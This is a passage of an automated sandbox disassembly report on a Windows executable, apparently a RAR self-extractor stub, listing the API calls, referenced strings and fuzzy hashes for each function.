        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: _free$ErrorFreeHeapLast
        • String ID:
        • API String ID: 776569668-0
        • Opcode ID: 24bc57bfd4cf0b11a69d6f048463fc86bd8f615b2fad9940e2232c3d2316f4be
        • Instruction ID: 7383fbb5a61f7d1d4576755d342825dd381aab8167d4722e87a828f439fd9eef
        • Opcode Fuzzy Hash: 24bc57bfd4cf0b11a69d6f048463fc86bd8f615b2fad9940e2232c3d2316f4be
        • Instruction Fuzzy Hash: 61F0B273545210AB8B21DF68F98AC1A77E9BF187517EA0C06F48CE7961CBB1FCC08655
        APIs
        • _wcslen.LIBCMT ref: 00133330
        • _wcslen.LIBCMT ref: 00133341
        • _wcslen.LIBCMT ref: 00133351
        • _wcslen.LIBCMT ref: 0013335F
        • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0012C844,?,?,00000000,?,?,?), ref: 0013337A
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: _wcslen$CompareString
        • String ID:
        • API String ID: 3397213944-0
        • Opcode ID: 34b634918e1fd0d0cc8e6ce33f64371cb0e9a974408b75b8b3adba94dedc8749
        • Instruction ID: 9e047dbf0b4b8dc85f428412c88b93edc311f51bc6e868bdc5deeb74e143b52d
        • Opcode Fuzzy Hash: 34b634918e1fd0d0cc8e6ce33f64371cb0e9a974408b75b8b3adba94dedc8749
        • Instruction Fuzzy Hash: C9F01736008214BFCF162F55EC09DCE3F26EB58B71B218425F6296E071CF7296959694
        APIs
        • _free.LIBCMT ref: 00149CDE
          • Part of subcall function 0014A65A: RtlFreeHeap.NTDLL(00000000,00000000,?,0014DA46,00154ADC,00000000,00154ADC,00000000,?,0014DA6D,00154ADC,00000007,00154ADC,?,0014DE6A,00154ADC), ref: 0014A670
          • Part of subcall function 0014A65A: GetLastError.KERNEL32(00154ADC,?,0014DA46,00154ADC,00000000,00154ADC,00000000,?,0014DA6D,00154ADC,00000007,00154ADC,?,0014DE6A,00154ADC,00154ADC), ref: 0014A682
        • _free.LIBCMT ref: 00149CF0
        • _free.LIBCMT ref: 00149D03
        • _free.LIBCMT ref: 00149D14
        • _free.LIBCMT ref: 00149D25
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: _free$ErrorFreeHeapLast
        • String ID:
        • API String ID: 776569668-0
        • Opcode ID: b8198bb9fdd43e6646ea12afe20a90701c7339f14e8f1c84a4e55abcb9800e5b
        • Instruction ID: 33fc1cca4d0a899dd9aaa21d1c71b406940f205369d6d423fbb28f3fa4ede60d
        • Opcode Fuzzy Hash: b8198bb9fdd43e6646ea12afe20a90701c7339f14e8f1c84a4e55abcb9800e5b
        • Instruction Fuzzy Hash: 90F01274846122DFCB026F14FD464063BA2FB397213870606F55957A71CF720AD18B85
        APIs
          • Part of subcall function 0013B699: GetDC.USER32(00000000), ref: 0013B69D
          • Part of subcall function 0013B699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0013B6A8
          • Part of subcall function 0013B699: ReleaseDC.USER32(00000000,00000000), ref: 0013B6B3
        • GetObjectW.GDI32(?,00000018,?), ref: 0013B83C
          • Part of subcall function 0013BACE: GetDC.USER32(00000000), ref: 0013BAD7
          • Part of subcall function 0013BACE: GetObjectW.GDI32(?,00000018,?), ref: 0013BB06
          • Part of subcall function 0013BACE: ReleaseDC.USER32(00000000,?), ref: 0013BB9E
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ObjectRelease$CapsDevice
        • String ID: (
        • API String ID: 1061551593-3887548279
        • Opcode ID: 8259913505b27fa6ec7e5d0d34ca0faa201bcd4b88899a30211c931963965f94
        • Instruction ID: 431f1d5da6940d0a40fabb182d4a4d24abf1fc7f4ba1d383b9bf80262c5939d5
        • Opcode Fuzzy Hash: 8259913505b27fa6ec7e5d0d34ca0faa201bcd4b88899a30211c931963965f94
        • Instruction Fuzzy Hash: 15910070608750AFD710DF25D884A2BBBE9FFC8705F00491EF69AD7260DB30A885CB62
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: _swprintf
        • String ID: %ls$%s: %s
        • API String ID: 589789837-2259941744
        • Opcode ID: 90e6f6412fde160b584a72fe5a21e48d10f672423844e1171ddb5a8f8c89bd8b
        • Instruction ID: c699a986b090430ad6b1dcaaca3b271cad6becfc969bc5d78b042db54161f871
        • Opcode Fuzzy Hash: 90e6f6412fde160b584a72fe5a21e48d10f672423844e1171ddb5a8f8c89bd8b
        • Instruction Fuzzy Hash: D9511635288315FFFE293A84DC02F36B669AB24B09F214506F38A754E9C7B25451AB1B
        APIs
        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\HSZXPMB7kS.exe,00000104), ref: 00149360
        • _free.LIBCMT ref: 0014942B
        • _free.LIBCMT ref: 00149435
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: _free$FileModuleName
        • String ID: C:\Users\user\Desktop\HSZXPMB7kS.exe
        • API String ID: 2506810119-1930514608
        • Opcode ID: 770274253c8c14a5369ae9d61e5d60a17adbd2b88007cefcbdd8c4de57cc6207
        • Instruction ID: e844c90a0aaa3f726056f2c0e3d4f40c25a161b51504c21c956ee83063f0f96d
        • Opcode Fuzzy Hash: 770274253c8c14a5369ae9d61e5d60a17adbd2b88007cefcbdd8c4de57cc6207
        • Instruction Fuzzy Hash: 15318F71A00218EFDB21DFA9DD8599FBBF8EB96310F1540A6F50497261D7708A818B91
        APIs
        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0014437B
        • _abort.LIBCMT ref: 00144486
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: EncodePointer_abort
        • String ID: MOC$RCC
        • API String ID: 948111806-2084237596
        • Opcode ID: ea958b73aff1a6471cf894e56cc4d130a8e7ce3ef90f252de51090ed7716d8d5
        • Instruction ID: 39b4b0c17175027d183721e429e76e7ba7332ca13a63205f47995859299de0e3
        • Opcode Fuzzy Hash: ea958b73aff1a6471cf894e56cc4d130a8e7ce3ef90f252de51090ed7716d8d5
        • Instruction Fuzzy Hash: 22414772900209EFDF15DF98CC81BAEBBB5BF48304F188159F918A7261D335AA50DB51
        APIs
        • __EH_prolog.LIBCMT ref: 00127F20
          • Part of subcall function 001242F1: __EH_prolog.LIBCMT ref: 001242F6
        • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00127FE5
          • Part of subcall function 00128704: GetCurrentProcess.KERNEL32(00000020,?), ref: 00128713
          • Part of subcall function 00128704: GetLastError.KERNEL32 ref: 00128759
          • Part of subcall function 00128704: CloseHandle.KERNEL32(?), ref: 00128768
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
        • String ID: SeRestorePrivilege$SeSecurityPrivilege
        • API String ID: 3813983858-639343689
        • Opcode ID: 48b06dc937cd65f326c7dba6af77fb21d6280d65364ad57ee4d2178c7ba9a363
        • Instruction ID: b5a5283ec5643879e5baec9fd9a34ed5a6da51324d088cc800146140cdce7f64
        • Opcode Fuzzy Hash: 48b06dc937cd65f326c7dba6af77fb21d6280d65364ad57ee4d2178c7ba9a363
        • Instruction Fuzzy Hash: A1310371904264BFDF20EB64BD01BEF7BA9EB14314F004025F814EB191CBB48E99DB60
        APIs
          • Part of subcall function 001212F6: GetParent.USER32(?), ref: 0012132A
          • Part of subcall function 001212F6: GetDlgItem.USER32(00000000,00003021), ref: 0012133A
          • Part of subcall function 001212F6: SetWindowTextW.USER32(00000000,001545F4), ref: 00121350
        • EndDialog.USER32(?,00000001), ref: 0013BE58
        • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0013BE6D
        • SetDlgItemTextW.USER32(?,00000066,?), ref: 0013BE82
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ItemText$DialogParentWindow
        • String ID: ASKNEXTVOL
        • API String ID: 364370097-3402441367
        • Opcode ID: 2ad163ff34bae87ce64962703bc35a71318551dd2be0b4e625258ed71cbadb0b
        • Instruction ID: c26966aa6bd2138bfcb6fe52381824dcc4dc99210663aa77766a5b72ec124fde
        • Opcode Fuzzy Hash: 2ad163ff34bae87ce64962703bc35a71318551dd2be0b4e625258ed71cbadb0b
        • Instruction Fuzzy Hash: 2F110832208120BFD7119F6CEC8AFB73BA9EB5AF00F040025F750EB0B4D7629A5197A5
        APIs
        • __fprintf_l.LIBCMT ref: 0012EC74
        • _strncpy.LIBCMT ref: 0012ECBA
          • Part of subcall function 001330E5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00163070,00000200,0012EC48,00000000,?,00000050,00163070), ref: 00133102
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ByteCharMultiWide__fprintf_l_strncpy
        • String ID: $%s$@%s
        • API String ID: 562999700-834177443
        • Opcode ID: 2c9b954a949b85cf2c71ceb4d48fe534527bafa51152f245695afea82992abac
        • Instruction ID: af66c7f7c64c821ca18e780a10a751202277190155bd28a11f9f3d94ac3cadb7
        • Opcode Fuzzy Hash: 2c9b954a949b85cf2c71ceb4d48fe534527bafa51152f245695afea82992abac
        • Instruction Fuzzy Hash: 7E219D72540218AFEB21EEE4ED42FEF3BE8AF14704F040526F9259A1A1E371D6788B51
        APIs
        • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0012C04A,00000008,?,00000000,?,0012E685,?,00000000), ref: 0013219E
        • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0012C04A,00000008,?,00000000,?,0012E685,?,00000000), ref: 001321A8
        • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0012C04A,00000008,?,00000000,?,0012E685,?,00000000), ref: 001321B8
        Strings
        • Thread pool initialization failed., xrefs: 001321D0
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Create$CriticalEventInitializeSectionSemaphore
        • String ID: Thread pool initialization failed.
        • API String ID: 3340455307-2182114853
        • Opcode ID: d20e3c9b6e32ebf36cbd489dc278cdc6288a77f58a2b0ac584afeb0168d72938
        • Instruction ID: 1a727b633385a7330e335916124ffb0b94ce4837193a772bb265b3c609a264d4
        • Opcode Fuzzy Hash: d20e3c9b6e32ebf36cbd489dc278cdc6288a77f58a2b0ac584afeb0168d72938
        • Instruction Fuzzy Hash: 2E11E7B1604704AFC3215F799C849A7FBECFB54344F14082EF2DAC7240D77059808B60
        APIs
          • Part of subcall function 001212F6: GetParent.USER32(?), ref: 0012132A
          • Part of subcall function 001212F6: GetDlgItem.USER32(00000000,00003021), ref: 0012133A
          • Part of subcall function 001212F6: SetWindowTextW.USER32(00000000,001545F4), ref: 00121350
        • EndDialog.USER32(?,00000001), ref: 0013C49E
        • GetDlgItemTextW.USER32(?,00000066,?,00000200), ref: 0013C4B6
        • SetDlgItemTextW.USER32(?,00000067,?), ref: 0013C4E4
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ItemText$DialogParentWindow
        • String ID: GETPASSWORD1
        • API String ID: 364370097-3292211884
        • Opcode ID: 50cadfd436b3e0824d4b7b5e088c505fb44afb3cab7f180f79618d0fcdab7da8
        • Instruction ID: 53f8c125e6fb750e24c3fc2863db5a3301fdc507e3ec03da077c88a622b11517
        • Opcode Fuzzy Hash: 50cadfd436b3e0824d4b7b5e088c505fb44afb3cab7f180f79618d0fcdab7da8
        • Instruction Fuzzy Hash: 2411C472A00128B6DB219E749D6DFFB3B6DEB09714F010010FB09F6480C3709A419BE0
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID:
        • String ID: RENAMEDLG$REPLACEFILEDLG
        • API String ID: 0-56093855
        • Opcode ID: 07753a0fd3bb70840833f5ce7db1fcf34cde55b2cb3feceb48432f5a8be50cff
        • Instruction ID: 8e5e262ee2ea23878ba186686b06abeb7a37faee123d0fdc3718f6bd8e20a2a3
        • Opcode Fuzzy Hash: 07753a0fd3bb70840833f5ce7db1fcf34cde55b2cb3feceb48432f5a8be50cff
        • Instruction Fuzzy Hash: 4B019E72604308EFDB114F29EC48A673BE5EB09394F540035F805A36B0C7B19D94DFA1
        APIs
          • Part of subcall function 0012F608: _swprintf.LIBCMT ref: 0012F62E
          • Part of subcall function 0012F608: _strlen.LIBCMT ref: 0012F64F
          • Part of subcall function 0012F608: SetDlgItemTextW.USER32(?,00160274,?), ref: 0012F6AF
          • Part of subcall function 0012F608: GetWindowRect.USER32(?,?), ref: 0012F6E9
          • Part of subcall function 0012F608: GetClientRect.USER32(?,?), ref: 0012F6F5
        • GetParent.USER32(?), ref: 0012132A
        • GetDlgItem.USER32(00000000,00003021), ref: 0012133A
        • SetWindowTextW.USER32(00000000,001545F4), ref: 00121350
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ItemRectTextWindow$ClientParent_strlen_swprintf
        • String ID: 0
        • API String ID: 1283792255-4108050209
        • Opcode ID: 27f85a57fd9fd5d2db50aaa730de09753c337b623d9ca1c9dc183f8306f97ca9
        • Instruction ID: 8e6d8dca855115ead7ebcca82e5c90b42f00adbd11e8cbdf2c2025b614649bd5
        • Opcode Fuzzy Hash: 27f85a57fd9fd5d2db50aaa730de09753c337b623d9ca1c9dc183f8306f97ca9
        • Instruction Fuzzy Hash: 0DF0A431104698BBDF16CF60AC0DBE93BAABB24354F044538FD44548A1D775C5B4EB14
        APIs
        • std::_Xinvalid_argument.LIBCPMT ref: 0012495C
          • Part of subcall function 0013FD0D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0013FD19
          • Part of subcall function 0013FD0D: ___delayLoadHelper2@8.DELAYIMP ref: 0013FD3F
        • std::_Xinvalid_argument.LIBCPMT ref: 00124967
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Xinvalid_argumentstd::_$Helper2@8Load___delaystd::invalid_argument::invalid_argument
        • String ID: string too long$vector too long
        • API String ID: 2355824318-1617939282
        • Opcode ID: ac084db7de78c04aa4b01697ab4c3edee380914d9900a3770afea91fd03c4f59
        • Instruction ID: 35a99088e48847c901a6fddaf159d48aa8e9970579d72cbda1a443ac76b8cc4d
        • Opcode Fuzzy Hash: ac084db7de78c04aa4b01697ab4c3edee380914d9900a3770afea91fd03c4f59
        • Instruction Fuzzy Hash: E0F02031200324AB8A24AF99FC4584BB3EDEF99B58750092AF940C3602D7B0E9948BB1
        APIs
        • LoadCursorW.USER32(00000000,00007F00), ref: 0013AC4B
        • RegisterClassExW.USER32(00000030), ref: 0013AC6C
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ClassCursorLoadRegister
        • String ID: 0$RarHtmlClassName
        • API String ID: 1693014935-3342523147
        • Opcode ID: 3f40666d3c0bafe1f257dde87f0a4f5f9ff95341988117518af5463f0fa5225a
        • Instruction ID: 905d893d3f925b90d8c89edafb065f8fd3443051055d7e692e607fe9e4124593
        • Opcode Fuzzy Hash: 3f40666d3c0bafe1f257dde87f0a4f5f9ff95341988117518af5463f0fa5225a
        • Instruction Fuzzy Hash: ABF0CFB1D11219ABDB009FD9DA88ADEFFB8FB08755F50402AE515B7240D7B85A048FE4
        Similarity
        • API ID: __alldvrm$_strrchr
        • String ID:
        • API String ID: 1036877536-0
        APIs
        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00128D5C,?,?,?), ref: 0012B7F3
        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000800,?,00128D5C,?,?), ref: 0012B837
        • SetFileTime.KERNEL32(?,00128AEC,?,00000000,?,00000800,?,00128D5C,?,?,?,?,?,?,?,?), ref: 0012B8B8
        • CloseHandle.KERNEL32(?,?,00000800,?,00128D5C,?,?,?,?,?,?,?,?,?,?), ref: 0012B8BF
        Similarity
        • API ID: File$Create$CloseHandleTime
        • String ID:
        • API String ID: 2287278272-0
        Similarity
        • API ID: _wcslen
        • String ID:
        • API String ID: 176396367-0
        APIs
        • _wcslen.LIBCMT ref: 00128532
        • _wcslen.LIBCMT ref: 00128558
        • _wcslen.LIBCMT ref: 001285EF
        • _wcslen.LIBCMT ref: 00128657
